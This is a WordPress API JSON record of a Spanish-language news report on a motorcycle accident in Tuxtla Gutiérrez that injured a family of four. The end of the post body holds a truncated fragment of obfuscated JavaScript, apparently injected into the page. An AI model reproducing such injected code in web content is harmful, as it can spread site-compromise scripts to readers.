{"id":16087,"date":"2024-06-13T03:23:32","date_gmt":"2024-06-13T03:23:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16087"},"modified":"2024-06-13T03:23:33","modified_gmt":"2024-06-13T03:23:33","slug":"cuatro-heridos-saldo-de-accidente-de-motocicleta","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16087","title":{"rendered":"Cuatro heridos, saldo de accidente de motocicleta"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718248885596-1024x576.jpg\" alt=\"\" class=\"wp-image-16088\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718248885596-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718248885596-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718248885596-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718248885596.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 12 de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la noche una familia que se transportaba en una motocicleta sufri\u00f3 un fuerte accidente de tr\u00e1nsito cuando se desplazaban en el Bulevar \u00c1ngel Albino Corzo, a la altura de la Bienestar Social.<\/p>\n\n\n\n<p>El padre, la madre y dos ni\u00f1as se desplazaban en el carril de Poniente a Oriente, sin embargo, el piso mojado hizo que la unidad derrapara y todos quedaron tendidos contra el pavimento.<\/p>\n\n\n\n<p>Mar\u00eda Guadalupe de 22 a\u00f1os y embarazada de 7 meses fue la que result\u00f3 m\u00e1s afectada.<\/p>\n\n\n\n<p>La lesionada fue atendida por param\u00e9dicos de la Cruz Roja Mexicana y trasladada al Hospital G\u00f3mez Maza para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>El resto de la familia se retiraron por sus propios medios, la moto fue llevada por otros particulares.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 12 de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la noche una familia que se transportaba en una motocicleta sufri\u00f3 un fuerte accidente de tr\u00e1nsito cuando se desplazaban en el Bulevar \u00c1ngel Albino Corzo, a la altura de la Bienestar Social. El padre, la madre y dos ni\u00f1as se &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16088,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-16087","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16087","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16087"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16087\/revisions"}],"predecessor-version":[{"id":16089,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16087\/revisions\/16089"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16088"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16087"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16087"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16087"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}